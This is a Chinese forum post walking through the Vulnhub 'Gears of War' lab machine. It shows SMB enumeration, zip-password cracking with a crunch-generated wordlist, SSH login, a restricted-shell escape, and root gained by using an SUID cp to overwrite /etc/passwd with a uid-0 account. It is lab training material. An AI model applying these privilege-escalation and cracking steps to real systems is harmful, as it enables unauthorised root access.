Vulnhub之Gears of War靶机详细测试过程

打印 上一主题 下一主题

主题 763|帖子 763|积分 2289

Gear of War

识别目标主机IP地址
  1. ─(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
  3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
  4.                                                                                                                            
  5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
  6. _____________________________________________________________________________
  7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  8. -----------------------------------------------------------------------------
  9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
  10. 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH                                                   
  11. 192.168.56.254  08:00:27:25:35:76      1      60  PCS Systemtechnik GmbH         
复制代码
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 22:11 EDT
  4. Nmap scan report for localhost (192.168.56.254)
  5. Host is up (0.000094s latency).
  6. Not shown: 65531 closed tcp ports (reset)
  7. PORT    STATE SERVICE     VERSION
  8. 22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  9. | ssh-hostkey:
  10. |   2048 09038d1ff8c9d4b443b3c37312ba95e1 (RSA)
  11. |   256 1ba05f3ea26b225a81c3187e5bfcd2bd (ECDSA)
  12. |_  256 181f0cd6e72af55c45cb8d7970314b7a (ED25519)
  13. 80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
  14. |_http-server-header: Apache/2.4.29 (Ubuntu)
  15. |_http-title: Site doesn't have a title (text/html).
  16. 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
  17. 445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
  18. MAC Address: 08:00:27:25:35:76 (Oracle VirtualBox virtual NIC)
  19. Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  20. Host script results:
  21. |_clock-skew: mean: -2s, deviation: 0s, median: -2s
  22. | smb2-time:
  23. |   date: 2023-05-01T02:11:52
  24. |_  start_date: N/A
  25. |_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
  26. | smb-security-mode:
  27. |   account_used: guest
  28. |   authentication_level: user
  29. |   challenge_response: supported
  30. |_  message_signing: disabled (dangerous, but default)
  31. | smb2-security-mode:
  32. |   311:
  33. |_    Message signing enabled but not required
  34. | smb-os-discovery:
  35. |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
  36. |   Computer name: gears_of_war
  37. |   NetBIOS computer name: GEARS_OF_WAR\x00
  38. |   Domain name: \x00
  39. |   FQDN: gears_of_war
  40. |_  System time: 2023-05-01T02:11:52+00:00
  41. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  42. Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
复制代码
获得Shell
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ smbclient -L 192.168.56.254                                
  3. Password for [WORKGROUP\kali]:
  4.         Sharename       Type      Comment
  5.         ---------       ----      -------
  6.         LOCUS_LAN$      Disk      LOCUST FATHER
  7.         IPC$            IPC       IPC Service (gears_of_war server (Samba, Ubuntu))
  8. Reconnecting with SMB1 for workgroup listing.
  9.         Server               Comment
  10.         ---------            -------
  11.         Workgroup            Master
  12.         ---------            -------
  13.         LOCUST               GEARS_OF_WAR
  14.                                                                                                                              
  15. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  16. └─$ smbclient //192.168.56.254/LOCUS_LAN$
  17. Password for [WORKGROUP\kali]:
  18. Try "help" to get a list of possible commands.
  19. smb: \> ls
  20.   .                                   D        0  Thu Oct 17 14:06:58 2019
  21.   ..                                  D        0  Thu Oct 17 09:51:38 2019
  22.   msg_horda.zip                       N      332  Thu Oct 17 10:53:33 2019
  23.   SOS.txt                             N      198  Thu Oct 17 14:06:58 2019
  24.                 5190756 blocks of size 1024. 2014200 blocks available
  25. smb: \> get SOS.txt
  26. getting file \SOS.txt of size 198 as SOS.txt (96.7 KiloBytes/sec) (average 96.7 KiloBytes/sec)
  27. smb: \> get msg_horda.zip
  28. getting file \msg_horda.zip of size 332 as msg_horda.zip (162.1 KiloBytes/sec) (average 129.4 KiloBytes/sec)
  29. smb: \> pwd
  30. Current directory is \\192.168.56.254\LOCUS_LAN$\
  31. smb: \> put test.txt
  32. NT_STATUS_ACCESS_DENIED opening remote file \test.txt
  33. smb: \> quit
复制代码

  • smb服务不允许上传文件
  • 将共享目录的文件下载到Kali Linux到本地
  1. ─(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ enum4linux 192.168.56.254
  3. [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                   
  4.                                                                                                                               
  5. S-1-22-1-1000 Unix User\marcus (Local User)         
复制代码
利用enum4linux工具识别目标主机存在marcus用户
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ cat SOS.txt                                                            
  3. This is a message for the Delta Team.
  4. I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
  5. i must protect myself, please try to get the password!!
  6. [@%%,]
  7. -Hoffman.
复制代码
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ unzip msg_horda.zip
  3. Archive:  msg_horda.zip
  4. [msg_horda.zip] key.txt password:                                                                                                                              
  5. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  6. └─$ zip2john msg_horda.zip > hash
  7. ver 2.0 efh 5455 efh 7875 msg_horda.zip/key.txt PKZIP Encr: TS_chk, cmplen=152, decmplen=216, crc=37552E74 ts=7635 cs=7635 type=8
  8.                                                                                                                               
  9. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  10. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash      
  11. Using default input encoding: UTF-8
  12. Loaded 1 password hash (PKZIP [32/64])
  13. Will run 2 OpenMP threads
  14. Press 'q' or Ctrl-C to abort, almost any other key for status
  15. 0g 0:00:00:01 DONE (2023-04-30 22:15) 0g/s 9313Kp/s 9313Kc/s 9313KC/s !LUVDKR!..*7¡Vamos!
  16. Session completed.
  17.                                                                                                                               
  18. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  19. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --force
  20. Using default input encoding: UTF-8
  21. Loaded 1 password hash (PKZIP [32/64])
  22. Will run 2 OpenMP threads
  23. Press 'q' or Ctrl-C to abort, almost any other key for status
  24. 0g 0:00:00:01 DONE (2023-04-30 22:16) 0g/s 13280Kp/s 13280Kc/s 13280KC/s !LUVDKR!..*7¡Vamos!
  25. Session completed.
复制代码
john没有破解出来。
SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ crunch 4 4 -t @%%, > dict
  3. Crunch will now generate the following amount of data: 338000 bytes
  4. 0 MB
  5. 0 GB
  6. 0 TB
  7. 0 PB
  8. Crunch will now generate the following number of lines: 67600
  9.                                                                                                                               
  10. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  11. └─$ wc -l dict                           
  12. 67600 dict
复制代码
这样就根据作者提示的表达式创建了字典,然后用该字典去破解压缩文件的密码。
  1. ──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ john --wordlist=dict hash                             
  3. Using default input encoding: UTF-8
  4. Loaded 1 password hash (PKZIP [32/64])
  5. Will run 2 OpenMP threads
  6. Press 'q' or Ctrl-C to abort, almost any other key for status
  7. r44M             (msg_horda.zip/key.txt)     
  8. 1g 0:00:00:00 DONE (2023-04-30 22:40) 16.66g/s 819200p/s 819200c/s 819200C/s r32Y..s90L
  9. Use the "--show" option to display all of the cracked passwords reliably
  10. Session completed.
复制代码
很快就破解得到了密码。
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ unzip msg_horda.zip
  3. Archive:  msg_horda.zip
  4. [msg_horda.zip] key.txt password:
  5.   inflating: key.txt                 
  6.                                                                                                                               
  7. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  8. └─$ cat key.txt              
  9. "Vamos a atacar a los humanos con toda nuestras hordas,
  10. por eso puse en prision a el hombre mas peligroso que tenian,
  11. por lo que sin el son debiles."
  12. [[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
  13. -General RAAM.
复制代码
3_d4y应该是某个用户的密码,而前面enum4linxu工具已经扫描出用户名为marcus
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ ssh marcus@192.168.56.254                                      
  3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
  4. ED25519 key fingerprint is SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78.
  5. This key is not known by any other names.
  6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  7. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
  8. marcus@192.168.56.254's password:
  9. Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
  10. * Documentation:  https://help.ubuntu.com
  11. * Management:     https://landscape.canonical.com
  12. * Support:        https://ubuntu.com/advantage
  13.   System information as of Mon May  1 02:43:25 UTC 2023
  14.   System load:  0.0               Processes:             94
  15.   Usage of /:   58.3% of 4.95GB   Users logged in:       0
  16.   Memory usage: 39%               IP address for enp0s3: 192.168.56.254
  17.   Swap usage:   0%
  18. * Canonical Livepatch is available for installation.
  19.    - Reduce system reboots and improve kernel security. Activate at:
  20.      https://ubuntu.com/livepatch
  21. 48 packages can be updated.
  22. 0 updates are security updates.
  23. Last login: Thu Oct 17 18:38:43 2019
  24. To run a command as administrator (user "root"), use "sudo <command>".
  25. See "man sudo_root" for details.
  26. marcus@gears_of_war:~$ id
  27. uid=1000(marcus) gid=1000(marcus) groups=1000(marcus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
  28. marcus@gears_of_war:~$ sudo -l
  29. [sudo] password for marcus:
  30. Sorry, user marcus may not run sudo on gears_of_war.
  31. marcus@gears_of_war:~$ ls -alh
  32. total 40K
  33. drwxrwxrwx 6 marcus marcus 4.0K Oct 17  2019 .
  34. drwxr-xr-x 4 root   root   4.0K Oct 17  2019 ..
  35. -rw------- 1 marcus marcus   17 Oct 17  2019 .bash_history
  36. -rwxrwxrwx 1 marcus marcus  220 Apr  4  2018 .bash_logout
  37. -rwxrwxrwx 1 marcus marcus 3.7K Apr  4  2018 .bashrc
  38. drwxrwxrwx 2 marcus marcus 4.0K Oct 16  2019 .cache
  39. drwxrwxrwx 3 marcus marcus 4.0K Oct 16  2019 .gnupg
  40. drwxrwxrwx 2 marcus marcus 4.0K Oct 17  2019 jail
  41. drwxrwxrwx 3 marcus marcus 4.0K Oct 16  2019 .local
  42. -rwxrwxrwx 1 marcus marcus  670 Oct 17  2019 .profile
  43. marcus@gears_of_war:~$ cat .bash_his-rbash: /dev/null: restricted: cannot redirect output
  44. bash: _upvars: `-a2': invalid number specifier
  45. -rbash: /dev/null: restricted: cannot redirect output
  46. bash: _upvars: `-a0': invalid number specifier
  47. cat: .bash_his: No such file or directory
  48. marcus@gears_of_war:~$ cat .bash_history
  49. history
  50. su root
  51. marcus@gears_of_war:~$ cd jail
  52. -rbash: cd: restricted
  53. marcus@gears_of_war:~$ which nc
  54. /bin/nc
复制代码
这应该是受限的shell
用-t ‘bash -noprofile'可绕过限制
cp命令有SUID位
提权

利用cp命令的SUID位进行提权,可以创建密码,然后写入/etc/passwd文件中去
  1. ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
  2. └─$ openssl passwd -6 -salt jason 123456                        
  3. $6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
  4.                                                                                                   
复制代码
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
内容添加到passwd(可以在/tmp目录下完成),然后利用cp命令覆盖原来的/etc/passwd文件
  1. marcus@gears_of_war:/tmp$ cp passwd /etc/passwd
  2. marcus@gears_of_war:/tmp$ su  - jason
  3. Password:
  4. root@gears_of_war:~# cd /root
  5. root@gears_of_war:~# ls -alh
  6. total 52K
  7. drwx------  6 root root 4.0K Oct 17  2019 .
  8. drwxr-xr-x 24 root root 4.0K Oct 16  2019 ..
  9. -rw-------  1 root root  216 Oct 17  2019 .bash_history
  10. -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
  11. drwx------  2 root root 4.0K Oct 17  2019 .cache
  12. -rw-r--r--  1 root root  13K Oct 17  2019 .flag.txt
  13. drwx------  3 root root 4.0K Oct 17  2019 .gnupg
  14. drwxr-xr-x  3 root root 4.0K Oct 16  2019 .local
  15. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  16. drwx------  2 root root 4.0K Oct 16  2019 .ssh
  17. root@gears_of_war:~# cat .flag.txt
  18.                                                                                                                                                                
  19.                                                                                                                                                                
  20.                                                                                                                                                                                                                                                                                                 
  21.                                                                                                                                                                
  22.                                                                                                                                                                
  23.                                                                                                      .,*,,                                                     
  24.                                                                                                   .*(((#((((*,.                                                
  25.                                                                                                ,*/,,,..*/(((/*/#(.                                             
  26.                                                                                             .*//*((####(/,,*,/(#(*                                             
  27.                                                          ..,*//((*,                  ....**/**(##########%#(*,*(#/.                                            
  28.                                                       .*/((#######((*.   ..,*..*,,**///*,,,/(################(//*,.                                            
  29.                                                     .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.                                            
  30.                                                    .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.                                            
  31.                                                    ,*(##(#((((/#######%#(###(##################################/((*                                            
  32.                                                    .*((#/*/(/(#############(#######################(#((#(######*((*                                            
  33.                                                    .*((((#####################################(########((######**/*.                                          
  34.                                                    ,/##((###########################################(##########*,(///.                                         
  35.                                                    *(((###%#####################################################(,****,                                       
  36.                                                  .,/(##(#######%%#####%############(#(############################(***,.                                       
  37.                                               .**(##%##%###(#####((###############%######//,,*/((###################(,...                                      
  38.                                             ./(##((##%#(##(/(((((##########################/*.     *(############%####(,.     .                                
  39.                                            **(####((###((///####%######################%####(*,       ,((###############*                                      
  40.                                          .,//*/((((#((/*,,*##################################((/        ./(#%#####%###%###/*****,.                             
  41.                                       ..*//(/*/#(((/(//*/#####################################(/.         ./#####%#%#################*.                        
  42.                             .,,,*//.**((#(/####(#((((,,(#######################################(*           ./(######################(/                        
  43.                           ,,,/(**((((*///(#(#####(/,../################(#(###(##################(             ,((%##############((((#((.                       
  44.                          .,*///(####(//(((######((.  ,/##################################%######(              .*(####%########(##(####*                       
  45.                         .**/((((##(((*//(/((###((*. ./((####################(###################(               .*(#########(#####(####(                       
  46.                        .,***/(///(((/##(/((####(*  .,*(###########################(##############*.              .*(###%#######/(((##(##,                     
  47.                        ,*//*/((//(####(((((#/((,.  .*##((####################(############(####/(/,,              ./(#######((((#((####(*                     
  48.                         ,/(((((((#(((((//##(((/.   ,*#%#####%#########################/,.  .*##/*((**              ,/################(*                        
  49.                          .*(/((//((/((((((/((//,   */##############################/.        *#((//#(,.             ,(##############/                          
  50.                            ,/((##(((((##(*///*,   .*(#%########(########%########(*          ,(#(//##*               *(##%########(.                           
  51.                             ./((/###(#(((((((//   ./#####%##%###(((#((############/          ./###((((*              ,(###%######(*                           
  52.                              .*###(##(/(#(#((/,    ,/###########(        .(####(###*.     .,/######(*/*              ./###########/                           
  53.                                ,/(##(#######/(,     ,/(###(/##(/.         /##########(##(############((.             ./#########%#(                           
  54.                                  /(###((#####/,      ,*((((####,         ./#####/,((#################(/,             ./###########/                           
  55.                                  /#########((/,        */##(/(#/.        *###, ((   .##############(/(/.             ./##%#######(/                           
  56.                                  (###########(,        .(((#(*//*    .,(((###   (.   *(#(######(#(*..*/,             ,(#(##%####((/                           
  57.                                 ./(####(#####/.         ,((##/,(#############*   (,  ,(##(#####(*. ....,.            *(##%##(##((/,                           
  58.                                 .*(((##(####%#/        .*((###/(#############(, .(#######(/((##. .  ,. ,,           .(#######(//*//.                           
  59.                                 .*/((#(#######(,        ,/#((/((##(##(################(#(##((##(/(. .               *##(######/(/(#/*                          
  60.                                ,/((//((#######(*,        ,*/(//((#############(########(#*,*...,*/  *              ,#######(#/(###(**/,                        
  61.                               ,(####/(#######(((/,         ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(.            .##########(((/////**,.                     
  62.                             .,*(**(#####%#######(*.         ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/,           ./#%####((##/////////***,                     
  63.                           ..//(/*(################(,,           .**,,/. ./(##/*(.* ...*(.,*,* *((##(/.          ./###%#((((##(/(((**/***,.                     
  64.                           ,**((/((#################//*.           ,/**#* ,((((/*/ , .,.*(.**/((######          *(##((#(######(//*//((/*,.                     
  65.                          *(#(*/(/####(##############((/,             ,(##.  *(#*,*.(*#* .((//##%##(((        ,*(###((((###(######/*,*,.                        
  66.                        ..,*((/#(((##(################((**.            ,####//((###(##/((((#######((/.      .*/(###(((((########*/,**,..                        
  67.                        ...,/#(#//########%#%###########(/**,.          *####################%%#(#(*.      ,((##((((#/(((#%%#((///*,,.                          
  68.                          ..*(##((######%#%###############(//**,         .##################%###/.      .,/(#######(##((//(//**,.                              
  69.                          .,*/(########%#####################((/*,.        *####%#%%%########(/*     .*/((######%%#(////*                                       
  70.                           .,***//((((#####%###################((/**..          ,/######((*.      ,*(####%########(((**.                                       
  71.                            .,**,****/**/**//***####################(/**,*,,... .,**/*..  ..,,,*/((#####%##########(/.                                          
  72.                                    ..,,********,,((####################(#(///******/*///(((###########%#####%###(/.                                            
  73.                                .           ,*******/(###################((#################################(###/,                                             
  74.                                              .,,,/**/##################(#######(#########################((####,                                               
  75.                                                 .*/*/#######################################################(#(.                                               
  76.                                                   .//############((((########(#######################((####((/*.                                               
  77.                                        .           ,(##########(((((((###########################((###(((((((*,                                                
  78.                                               .   .((############((((###(*,,*//*///*//(##%############((//**/*,                                                
  79.                                                   .*(######(#(#######(**,              .*(#######((((/(//**,,                                                  
  80.                                            .       ,*/#####((((((##/,  .*.                ./###((((////,.                                                      
  81.                                                    .,.,,//#########*.. .                 ,,  /((/(/*,                                                         
  82.                                      .         .  .    ,../(#####(*/   .    .                  ..                                                              
  83.                                                      * ..  .,/(#*.   .    .                                                                                    
  84.                                                           .,../#,  .    .           .                                                                          
  85.                                                .   .          .#/  .                       .                                                                  
  86.                                                  ..           .#/              .                                                                              
  87.                                                                #/                                                                                             
  88.                                                         .     .(/                                                                                             
  89.                                         .                      /#                                                                                             
  90.                                                             .  ,(.       .             .                                                                       
  91.                                                ..              ,((     .                                                                                       
  92.                                                                                                                                                                
  93.                                                                                                                                                                
  94.                                                                                                                                                                
  95.                                                                                                                                                                
  96. Congratulation you got out of the jail and finish this Episode#1!
  97. Please share and support me on twitter!
  98. Twitter: @sir809
  99. root@gears_of_war:~#
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

tsx81429

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表